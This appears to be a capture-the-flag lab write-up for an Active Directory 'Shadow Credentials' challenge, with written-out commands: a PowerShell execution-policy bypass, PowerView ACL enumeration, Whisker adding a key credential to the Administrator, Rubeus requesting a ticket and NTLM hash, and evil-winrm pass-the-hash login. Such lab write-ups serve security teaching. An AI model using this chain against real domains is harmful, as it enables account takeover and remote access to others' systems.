Day 11

Active Directory Jingle Bells, Shadow Spells

Learning Objectives

Understanding Active Directory
Introduction to Windows Hello for Business
Prerequisites for exploiting GenericWrite privilege
How the Shadow Credentials attack works
How to exploit the vulnerability

Active Directory 101

Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.

This room is straightforward will all the commands and instructions given to us.

As instructed we first execute the following command in powershell as part of our enumeration.

cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.

We then execute this command.

Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

We can now procced with the exploit.

As instructed we use the tool Whisker.

Whisker a C# utility created by Elad Shamir. Using Whisker is straightforward: once we have a vulnerable user, we can run the add command from Whisker to simulate the enrollment of a malicious device, updating the msDS-KeyCredentialLink attribute.

This task can be accomplished by running the following command:

.\Whisker.exe add /target:Administrator

In our case, we'll have to replace the /target parameter with the one from the enumeration step executed inside our VM.

The tool will conveniently provide the certificate necessary to authenticate the impersonation of the vulnerable user with a command ready to be launched using Rubeus.

Rubeus is a C# toolset designed for direct Kerberos interaction and exploitation, was developed by SpecterOps. a pass-the-hash attack!

The next command will be

.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>

This will give us an NTLM hash which we can use Evil-WinRM, a tool for remotely managing Windows systems abusing the Windows Remote Management (WinRM) protocol.

evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'

This will gives us remote access and we can proceed with answering the questions.

What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output for Rubeus

What is the content of flag.txt on the Administrator Desktop?
[REDACTED]

PreviousDay 10 NextDay 12

Last updated 1 year ago

cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools. powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution. . .\PowerView.ps1 #loads the PowerView script into the memory.